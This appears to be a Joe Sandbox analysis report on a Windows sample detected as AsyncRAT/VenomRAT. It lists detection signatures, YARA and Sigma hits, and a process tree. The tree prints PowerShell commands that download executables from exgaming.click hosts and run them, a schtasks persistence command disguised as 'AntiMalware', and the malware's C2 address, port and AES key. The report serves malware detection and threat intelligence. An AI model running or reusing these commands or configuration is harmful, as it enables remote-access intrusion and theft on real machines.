Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZzOTKK2V8l.exe

Overview

General Information

Sample name:ZzOTKK2V8l.exe
renamed because original name is a hash value
Original sample name:c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
Analysis ID:1447641
MD5:9f7b2bf836c0e9682f7f612fc60d88f9
SHA1:2a99db9697d168488ef962ff51f0599e89bfeaeb
SHA256:c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660
Tags:exevenomrat
Infos:

Detection

AsyncRAT, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ZzOTKK2V8l.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\ZzOTKK2V8l.exe" MD5: 9F7B2BF836C0E9682F7F612FC60D88F9)
    • cmd.exe (PID: 6516 cmdline: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2108 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4444 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5760 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2972 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1684 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5752 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 748 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • AntiMalware.exe (PID: 4852 cmdline: "C:\Users\user\AppData\Roaming\AntiMalware.exe" MD5: 9F7B2BF836C0E9682F7F612FC60D88F9)
        • cmd.exe (PID: 6776 cmdline: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2464 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 4408 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 3472 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 748 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • AntiMalware.exe (PID: 2680 cmdline: C:\Users\user\AppData\Roaming\AntiMalware.exe MD5: 9F7B2BF836C0E9682F7F612FC60D88F9)
    • cmd.exe (PID: 2892 cmdline: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4204 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5144 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 3292 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1492 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: VenomRAT

{"Server": "94.156.65.172", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "AntiMalware.exe", "AES_key": "jJXnCe880wpEw5c4UGtj4RyhmqzVM1cb", "Mutex": "izslwuidilziewad", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}

Threatname: AsyncRAT

{"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ZzOTKK2V8l.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    ZzOTKK2V8l.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
    • 0xfd07:$q1: Select * from Win32_CacheMemory
    • 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
    • 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
    • 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\AntiMalware.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      C:\Users\user\AppData\Roaming\AntiMalware.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0xfd07:$q1: Select * from Win32_CacheMemory
      • 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VenomRATYara detected VenomRATJoe Security
          Process Memory Space: ZzOTKK2V8l.exe PID: 6368JoeSecurity_VenomRATYara detected VenomRATJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.ZzOTKK2V8l.exe.36ea760.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              0.2.ZzOTKK2V8l.exe.36ea760.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
              • 0xdf07:$q1: Select * from Win32_CacheMemory
              • 0xdf47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
              • 0xdf95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
              • 0xdfe3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
              0.0.ZzOTKK2V8l.exe.600000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                0.0.ZzOTKK2V8l.exe.600000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                • 0xfd07:$q1: Select * from Win32_CacheMemory
                • 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                • 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                • 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpackJoeSecurity_VenomRATYara detected VenomRATJoe Security
                  Click to see the 1 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_2108.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi64_4444.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_4204.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi64_2464.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                          amsi64_4408.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                            Click to see the 1 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, ProcessId: 1684, ProcessName: cmd.exe
                            Sigma detected: Invoke-Obfuscation VAR+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, ProcessId: 1684, ProcessName: cmd.exe
                            Sigma detected: PowerShell DownloadFile
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , ProcessId: 2108, ProcessName: powershell.exe
                            Sigma detected: PowerShell Download Pattern
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , ProcessId: 2108, ProcessName: powershell.exe
                            Sigma detected: PowerShell Web Download
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1684, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' , ProcessId: 5752, ProcessName: schtasks.exe
                            Sigma detected: Usage Of Web Request Commands And Cmdlets
                            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
